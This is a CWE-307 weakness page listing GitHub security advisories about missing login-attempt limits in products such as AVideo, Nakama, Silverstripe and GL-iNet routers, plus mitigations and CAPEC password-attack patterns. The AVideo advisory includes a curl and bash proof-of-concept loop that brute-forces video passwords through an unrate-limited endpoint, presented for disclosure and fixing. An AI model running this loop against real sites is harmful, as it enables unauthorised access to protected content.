Common Weakness Enumeration

CWE-307

Allowed

Improper Restriction of Excessive Authentication Attempts

Abstraction: Base · Status: Draft

The product does not implement sufficient measures to prevent multiple failed authentication attempts within a short time frame.

905 vulnerabilities reference this CWE, most recent first.

GHSA-8PRQ-2JR2-CM92

Vulnerability from github – Published: 2026-03-26 18:07 – Updated: 2026-03-27 21:38
VLAI
Summary
AVideo has an Unauthenticated Video Password Brute-Force Vulnerability via Unrate-Limited Boolean Oracle
Details

Summary

The get_api_video_password_is_correct API endpoint allows any unauthenticated user to verify whether a given password is correct for any password-protected video. The endpoint returns a boolean passwordIsCorrect field with no rate limiting, CAPTCHA, or authentication requirement, enabling efficient offline-speed brute-force attacks against video passwords.

Details

The vulnerable endpoint is defined at plugin/API/API.php:1111-1133:

public function get_api_video_password_is_correct($parameters)
{
    $obj = new stdClass();
    $obj->videos_id = intval($parameters['videos_id']);
    $obj->passwordIsCorrect = true;
    $error = true;
    $msg = '';

    if (!empty($obj->videos_id)) {
        $error = false;
        $video = new Video('', '', $obj->videos_id);
        $password = $video->getVideo_password();
        if (!empty($password)) {
            $obj->passwordIsCorrect = $password == $parameters['video_password'];
        }
    } else {
        $msg = 'Videos id is required';
    }

    return new ApiObject($msg, $error, $obj);
}

The get() dispatcher at API.php:191-209 routes GET requests directly to this method without any authentication enforcement:

public function get($parameters) {
    // ... optional user login if credentials provided ...
    $APIName = $parameters['APIName'];
    if (method_exists($this, "get_api_$APIName")) {
        $str = "\$object = \$this->get_api_$APIName(\$parameters);";
        eval($str);
    }
}

The application has a checkRateLimit() mechanism (line 5737) that is applied to user registration (line 4232) and user deactivation (line 5705), but is not applied to this password verification endpoint.

Additionally, video passwords are stored in plaintext (objects/video.php:523-527):

public function setVideo_password($video_password) {
    AVideoPlugin::onVideoSetVideo_password($this->id, $this->video_password, $video_password);
    $this->video_password = trim($video_password);
}

The comparison at line 1125 uses loose equality (==) rather than strict equality (===).

PoC

Step 1: Identify a password-protected video

curl -s "http://localhost/plugin/API/get.json.php?APIName=video&videos_id=1" | jq '.response.rows[0].video_password'

A non-empty value (e.g., "1") indicates the video is password-protected.

Step 2: Test incorrect password (oracle returns false)

curl -s "http://localhost/plugin/API/get.json.php?APIName=video_password_is_correct&videos_id=1&video_password=wrongguess"

Expected response:

{"response":{"videos_id":1,"passwordIsCorrect":false},"error":false}

Step 3: Brute-force the password

for pw in password 123456 secret admin test video1 qwerty; do
  result=$(curl -s "http://localhost/plugin/API/get.json.php?APIName=video_password_is_correct&videos_id=1&video_password=$pw" | jq -r '.response.passwordIsCorrect')
  echo "$pw: $result"
  [ "$result" = "true" ] && echo "FOUND: $pw" && break
done

No rate limiting is encountered regardless of request volume.

Step 4: Unlock the video with the discovered password

curl -s "http://localhost/view/video.php?v=1&video_password=DISCOVERED_PASSWORD" -c cookies.txt

The password is stored in the session (CustomizeUser.php:806-807) granting persistent access.

Impact

An attacker can brute-force the password of any password-protected video on the platform without authentication. Since video passwords are typically simple shared secrets (not per-user credentials), common password dictionaries are likely to succeed quickly. Successful exploitation bypasses the access control for password-protected content, which may include commercially sensitive, private, or restricted video content. The lack of any rate limiting means an attacker can test thousands of passwords per second.

Recommended Fix

  1. Add rate limiting to the endpoint using the existing checkRateLimit() mechanism:
public function get_api_video_password_is_correct($parameters)
{
    $this->checkRateLimit('video_password_check', 5, 300); // 5 attempts per 5 minutes per IP

    $obj = new stdClass();
    $obj->videos_id = intval($parameters['videos_id']);
    // ... rest of existing code
}
  1. Hash video passwords using password_hash()/password_verify() instead of plaintext storage and loose comparison:
// In setVideo_password:
$this->video_password = password_hash(trim($video_password), PASSWORD_DEFAULT);

// In the check endpoint:
$obj->passwordIsCorrect = password_verify($parameters['video_password'], $password);
  1. Use strict comparison (===) if plaintext passwords must be retained temporarily during migration.
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33763"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-307"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-26T18:07:38Z",
    "nvd_published_at": "2026-03-27T15:16:58Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe `get_api_video_password_is_correct` API endpoint allows any unauthenticated user to verify whether a given password is correct for any password-protected video. The endpoint returns a boolean `passwordIsCorrect` field with no rate limiting, CAPTCHA, or authentication requirement, enabling efficient offline-speed brute-force attacks against video passwords.\n\n## Details\n\nThe vulnerable endpoint is defined at `plugin/API/API.php:1111-1133`:\n\n```php\npublic function get_api_video_password_is_correct($parameters)\n{\n    $obj = new stdClass();\n    $obj-\u003evideos_id = intval($parameters[\u0027videos_id\u0027]);\n    $obj-\u003epasswordIsCorrect = true;\n    $error = true;\n    $msg = \u0027\u0027;\n\n    if (!empty($obj-\u003evideos_id)) {\n        $error = false;\n        $video = new Video(\u0027\u0027, \u0027\u0027, $obj-\u003evideos_id);\n        $password = $video-\u003egetVideo_password();\n        if (!empty($password)) {\n            $obj-\u003epasswordIsCorrect = $password == $parameters[\u0027video_password\u0027];\n        }\n    } else {\n        $msg = \u0027Videos id is required\u0027;\n    }\n\n    return new ApiObject($msg, $error, $obj);\n}\n```\n\nThe `get()` dispatcher at `API.php:191-209` routes GET requests directly to this method without any authentication enforcement:\n\n```php\npublic function get($parameters) {\n    // ... optional user login if credentials provided ...\n    $APIName = $parameters[\u0027APIName\u0027];\n    if (method_exists($this, \"get_api_$APIName\")) {\n        $str = \"\\$object = \\$this-\u003eget_api_$APIName(\\$parameters);\";\n        eval($str);\n    }\n}\n```\n\nThe application has a `checkRateLimit()` mechanism (line 5737) that is applied to user registration (line 4232) and user deactivation (line 5705), but is **not** applied to this password verification endpoint.\n\nAdditionally, video passwords are stored in plaintext (`objects/video.php:523-527`):\n\n```php\npublic function setVideo_password($video_password) {\n    AVideoPlugin::onVideoSetVideo_password($this-\u003eid, $this-\u003evideo_password, $video_password);\n    $this-\u003evideo_password = trim($video_password);\n}\n```\n\nThe comparison at line 1125 uses loose equality (`==`) rather than strict equality (`===`).\n\n## PoC\n\n**Step 1: Identify a password-protected video**\n\n```bash\ncurl -s \"http://localhost/plugin/API/get.json.php?APIName=video\u0026videos_id=1\" | jq \u0027.response.rows[0].video_password\u0027\n```\n\nA non-empty value (e.g., `\"1\"`) indicates the video is password-protected.\n\n**Step 2: Test incorrect password (oracle returns false)**\n\n```bash\ncurl -s \"http://localhost/plugin/API/get.json.php?APIName=video_password_is_correct\u0026videos_id=1\u0026video_password=wrongguess\"\n```\n\nExpected response:\n```json\n{\"response\":{\"videos_id\":1,\"passwordIsCorrect\":false},\"error\":false}\n```\n\n**Step 3: Brute-force the password**\n\n```bash\nfor pw in password 123456 secret admin test video1 qwerty; do\n  result=$(curl -s \"http://localhost/plugin/API/get.json.php?APIName=video_password_is_correct\u0026videos_id=1\u0026video_password=$pw\" | jq -r \u0027.response.passwordIsCorrect\u0027)\n  echo \"$pw: $result\"\n  [ \"$result\" = \"true\" ] \u0026\u0026 echo \"FOUND: $pw\" \u0026\u0026 break\ndone\n```\n\nNo rate limiting is encountered regardless of request volume.\n\n**Step 4: Unlock the video with the discovered password**\n\n```bash\ncurl -s \"http://localhost/view/video.php?v=1\u0026video_password=DISCOVERED_PASSWORD\" -c cookies.txt\n```\n\nThe password is stored in the session (`CustomizeUser.php:806-807`) granting persistent access.\n\n## Impact\n\nAn attacker can brute-force the password of any password-protected video on the platform without authentication. Since video passwords are typically simple shared secrets (not per-user credentials), common password dictionaries are likely to succeed quickly. Successful exploitation bypasses the access control for password-protected content, which may include commercially sensitive, private, or restricted video content. The lack of any rate limiting means an attacker can test thousands of passwords per second.\n\n## Recommended Fix\n\n1. **Add rate limiting** to the endpoint using the existing `checkRateLimit()` mechanism:\n\n```php\npublic function get_api_video_password_is_correct($parameters)\n{\n    $this-\u003echeckRateLimit(\u0027video_password_check\u0027, 5, 300); // 5 attempts per 5 minutes per IP\n\n    $obj = new stdClass();\n    $obj-\u003evideos_id = intval($parameters[\u0027videos_id\u0027]);\n    // ... rest of existing code\n}\n```\n\n2. **Hash video passwords** using `password_hash()`/`password_verify()` instead of plaintext storage and loose comparison:\n\n```php\n// In setVideo_password:\n$this-\u003evideo_password = password_hash(trim($video_password), PASSWORD_DEFAULT);\n\n// In the check endpoint:\n$obj-\u003epasswordIsCorrect = password_verify($parameters[\u0027video_password\u0027], $password);\n```\n\n3. **Use strict comparison** (`===`) if plaintext passwords must be retained temporarily during migration.",
  "id": "GHSA-8prq-2jr2-cm92",
  "modified": "2026-03-27T21:38:24Z",
  "published": "2026-03-26T18:07:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8prq-2jr2-cm92"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33763"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/01a0614fedcdaee47832c0d913a0fb86d8c28135"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo has an Unauthenticated Video Password Brute-Force Vulnerability via Unrate-Limited Boolean Oracle"
}

GHSA-8PWW-55PM-85VV

Vulnerability from github – Published: 2024-08-06 18:30 – Updated: 2024-08-07 21:31
VLAI
Details

GL-iNet products AR750/AR750S/AR300M/AR300M16/MT300N-V2/B1300/MT1300/SFT1200/X750 v4.3.11, MT3000/MT2500/AXT1800/AX1800/A1300/X300B v4.5.16, XE300 v4.3.16, E750 v4.3.12, AP1300/S1300 v4.3.13, and XE3000/X3000 v4.4 were discovered to contain a remote code execution (RCE) vulnerability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-39225"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-307"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-08-06T16:15:48Z",
    "severity": "CRITICAL"
  },
  "details": "GL-iNet products AR750/AR750S/AR300M/AR300M16/MT300N-V2/B1300/MT1300/SFT1200/X750 v4.3.11, MT3000/MT2500/AXT1800/AX1800/A1300/X300B v4.5.16, XE300 v4.3.16, E750 v4.3.12, AP1300/S1300 v4.3.13, and XE3000/X3000 v4.4 were discovered to contain a remote code execution (RCE) vulnerability.",
  "id": "GHSA-8pww-55pm-85vv",
  "modified": "2024-08-07T21:31:44Z",
  "published": "2024-08-06T18:30:56Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39225"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Bypass%20the%20login%20mechanism.md"
    },
    {
      "type": "WEB",
      "url": "http://ar750ar750sar300mar300m16mt300n-v2b1300mt1300sft1200x750.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-8QCV-2VPM-XFXG

Vulnerability from github – Published: 2025-07-03 12:34 – Updated: 2025-07-03 12:34
VLAI
Details

The MEAC300-FNADE4 does not implement sufficient measures to prevent multiple failed authentication attempts within a short time frame, making it susceptible to brute-force attacks.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-27449"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-307"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-07-03T12:15:22Z",
    "severity": "HIGH"
  },
  "details": "The MEAC300-FNADE4 does not implement sufficient measures to prevent multiple failed authentication attempts within a short time frame, making it susceptible to brute-force attacks.",
  "id": "GHSA-8qcv-2vpm-xfxg",
  "modified": "2025-07-03T12:34:57Z",
  "published": "2025-07-03T12:34:57Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27449"
    },
    {
      "type": "WEB",
      "url": "https://sick.com/psirt"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices"
    },
    {
      "type": "WEB",
      "url": "https://www.endress.com"
    },
    {
      "type": "WEB",
      "url": "https://www.first.org/cvss/calculator/3.1"
    },
    {
      "type": "WEB",
      "url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0008.json"
    },
    {
      "type": "WEB",
      "url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0008.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-8R94-4H3C-939F

Vulnerability from github – Published: 2022-07-06 00:00 – Updated: 2022-07-15 20:44
VLAI
Summary
Improper Restriction of Excessive Authentication Attempts
Details

Nakama Console does not enforce any limit for the number of unsuccessful login attempts.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/heroiclabs/nakama/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "3.12.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-2321"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-307"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-07-06T19:58:27Z",
    "nvd_published_at": "2022-07-05T19:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "Nakama Console does not enforce any limit for the number of unsuccessful login attempts.",
  "id": "GHSA-8r94-4h3c-939f",
  "modified": "2022-07-15T20:44:32Z",
  "published": "2022-07-06T00:00:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-2321"
    },
    {
      "type": "WEB",
      "url": "https://github.com/heroiclabs/nakama/pull/878"
    },
    {
      "type": "WEB",
      "url": "https://github.com/heroiclabs/nakama/commit/e2e02fce80ff33ce45f8a6ebc0b7a99ee0b03824"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/heroiclabs/nakama"
    },
    {
      "type": "WEB",
      "url": "https://huntr.dev/bounties/3055b3f5-6b80-4d47-8e00-3500dfb458bc"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Improper Restriction of Excessive Authentication Attempts"
}

GHSA-8RF3-52XM-W6JC

Vulnerability from github – Published: 2025-02-18 21:32 – Updated: 2026-04-01 18:33
VLAI
Details

Improper Restriction of Excessive Authentication Attempts vulnerability in Rameez Iqbal Real Estate Manager allows Password Brute Forcing. This issue affects Real Estate Manager: from n/a through 7.3.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-22645"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-307"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-02-18T20:15:26Z",
    "severity": "MODERATE"
  },
  "details": "Improper Restriction of Excessive Authentication Attempts vulnerability in Rameez Iqbal Real Estate Manager allows Password Brute Forcing. This issue affects Real Estate Manager: from n/a through 7.3.",
  "id": "GHSA-8rf3-52xm-w6jc",
  "modified": "2026-04-01T18:33:41Z",
  "published": "2025-02-18T21:32:51Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-22645"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/wordpress/plugin/real-estate-manager/vulnerability/wordpress-real-estate-manager-property-listing-and-agent-management-plugin-7-3-captcha-bypass-vulnerability-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-8V6M-7F5V-HHX6

Vulnerability from github – Published: 2024-05-23 19:37 – Updated: 2024-05-23 19:37
VLAI
Summary
Silverstripe Brute force bypass on default admin
Details

Default Administrator accounts were not subject to the same brute force protection afforded to other Member accounts. Failed login counts were not logged for default admins resulting in unlimited attempts on the default admin username and password.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "silverstripe/framework"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.1.18"
            },
            {
              "fixed": "3.1.19"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "silverstripe/framework"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.2.3"
            },
            {
              "fixed": "3.2.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "silverstripe/framework"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.3.1"
            },
            {
              "fixed": "3.3.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-307"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-05-23T19:37:11Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "Default Administrator accounts were not subject to the same brute force protection afforded to other Member accounts. Failed login counts were not logged for default admins resulting in unlimited attempts on the default admin username and password.",
  "id": "GHSA-8v6m-7f5v-hhx6",
  "modified": "2024-05-23T19:37:11Z",
  "published": "2024-05-23T19:37:11Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/silverstripe/silverstripe-framework/commit/f32c893546340c8c279fd1ab6d4269e9d6539bc2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/framework/SS-2016-005-1.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/silverstripe/silverstripe-framework"
    },
    {
      "type": "WEB",
      "url": "https://www.silverstripe.org/download/security-releases/ss-2016-005"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Silverstripe Brute force bypass on default admin"
}

GHSA-8XPJ-F658-F859

Vulnerability from github – Published: 2022-05-24 17:19 – Updated: 2024-04-04 02:54
VLAI
Details

Royal TS before 5 has a 0.0.0.0 listener, which makes it easier for attackers to bypass tunnel authentication via a brute-force approach.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-13872"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-307"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-06-09T19:15:00Z",
    "severity": "HIGH"
  },
  "details": "Royal TS before 5 has a 0.0.0.0 listener, which makes it easier for attackers to bypass tunnel authentication via a brute-force approach.",
  "id": "GHSA-8xpj-f658-f859",
  "modified": "2024-04-04T02:54:21Z",
  "published": "2022-05-24T17:19:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13872"
    },
    {
      "type": "WEB",
      "url": "https://hacktips.it/royalts-ssh-tunnel-authentication-bypass"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/158000/RoyalTS-SSH-Tunnel-Authentication-Bypass.html"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2020/Jun/14"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-93P6-C827-87MM

Vulnerability from github – Published: 2021-12-11 00:00 – Updated: 2021-12-15 00:01
VLAI
Details

Due to insufficient server-side login-attempt limit enforcement, a vulnerability in /account/login in Huntflow Enterprise before 3.10.14 could allow an unauthenticated, remote user to perform multiple login attempts for brute-force password guessing.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-37934"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-307"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-12-10T17:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "Due to insufficient server-side login-attempt limit enforcement, a vulnerability in /account/login in Huntflow Enterprise before 3.10.14 could allow an unauthenticated, remote user to perform multiple login attempts for brute-force password guessing.",
  "id": "GHSA-93p6-c827-87mm",
  "modified": "2021-12-15T00:01:33Z",
  "published": "2021-12-11T00:00:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37934"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/andrey-lomtev/4ec9004101152ea9d0043a09d59498a6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-93V4-P5MH-4HR7

Vulnerability from github – Published: 2023-01-20 09:30 – Updated: 2023-01-26 21:30
VLAI
Details

HCL BigFix Mobile / Modern Client Management Admin and Config UI passwords can be brute-forced. User should be locked out for multiple invalid attempts.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-27782"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-307"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-01-20T07:15:00Z",
    "severity": "HIGH"
  },
  "details": "HCL BigFix Mobile / Modern Client Management Admin and Config UI passwords can be brute-forced. User should be locked out for multiple invalid attempts.",
  "id": "GHSA-93v4-p5mh-4hr7",
  "modified": "2023-01-26T21:30:31Z",
  "published": "2023-01-20T09:30:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-27782"
    },
    {
      "type": "WEB",
      "url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0102477"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9445-66J5-FHVJ

Vulnerability from github – Published: 2022-05-24 17:43 – Updated: 2022-05-24 17:43
VLAI
Details

The telnet administrator service running on port 650 on Gigaset DX600A v41.00-175 devices does not implement any lockout or throttling functionality. This situation (together with the weak password policy that forces a 4-digit password) allows remote attackers to easily obtain administrative access via brute-force attacks.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-25309"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269",
      "CWE-307"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-03-02T01:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "The telnet administrator service running on port 650 on Gigaset DX600A v41.00-175 devices does not implement any lockout or throttling functionality. This situation (together with the weak password policy that forces a 4-digit password) allows remote attackers to easily obtain administrative access via brute-force attacks.",
  "id": "GHSA-9445-66j5-fhvj",
  "modified": "2022-05-24T17:43:28Z",
  "published": "2022-05-24T17:43:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-25309"
    },
    {
      "type": "WEB",
      "url": "https://research.nccgroup.com/2021/02/28/technical-advisory-administrative-passcode-recovery-and-authenticated-remote-buffer-overflow-vulnerabilities-in-gigaset-dx600a-handset-cve-2021-25309-cve-2021-25306"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design
  • Common protection mechanisms include:
  • Disconnecting the user after a small number of failed attempts
  • Implementing a timeout
  • Locking out a targeted account
  • Requiring a computational task on the user's part.
Mitigation MIT-4
Architecture and Design

Strategy: Libraries or Frameworks

  • Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].
  • Consider using libraries with authentication capabilities such as OpenSSL or the ESAPI Authenticator. [REF-45]
CAPEC-16: Dictionary-based Password Attack

An attacker tries each of the words in a dictionary as passwords to gain access to the system via some user's account. If the password chosen by the user was a word within the dictionary, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern.

Dictionary Attacks differ from similar attacks such as Password Spraying (CAPEC-565) and Credential Stuffing (CAPEC-600), since they leverage unknown username/password combinations and don't care about inducing account lockouts.

CAPEC-49: Password Brute Forcing

An adversary tries every possible value for a password until they succeed. A brute force attack, if feasible computationally, will always be successful because it will essentially go through all possible passwords given the alphabet used (lower case letters, upper case letters, numbers, symbols, etc.) and the maximum length of the password.

CAPEC-560: Use of Known Domain Credentials

An adversary guesses or obtains (i.e. steals or purchases) legitimate credentials (e.g. userID/password) to achieve authentication and to perform authorized actions under the guise of an authenticated user or service.

CAPEC-565: Password Spraying

In a Password Spraying attack, an adversary tries a small list (e.g. 3-5) of common or expected passwords, often matching the target's complexity policy, against a known list of user accounts to gain valid credentials. The adversary tries a particular password for each user account, before moving onto the next password in the list. This approach assists the adversary in remaining undetected by avoiding rapid or frequent account lockouts. The adversary may then reattempt the process with additional passwords, once enough time has passed to prevent inducing a lockout.

CAPEC-600: Credential Stuffing

An adversary tries known username/password combinations against different systems, applications, or services to gain additional authenticated access. Credential Stuffing attacks rely upon the fact that many users leverage the same username/password combination for multiple systems, applications, and services.

CAPEC-652: Use of Known Kerberos Credentials

An adversary obtains (i.e. steals or purchases) legitimate Kerberos credentials (e.g. Kerberos service account userID/password or Kerberos Tickets) with the goal of achieving authenticated access to additional systems, applications, or services within the domain.

CAPEC-653: Use of Known Operating System Credentials

An adversary guesses or obtains (i.e. steals or purchases) legitimate operating system credentials (e.g. userID/password) to achieve authentication and to perform authorized actions on the system, under the guise of an authenticated user or service. This applies to any Operating System.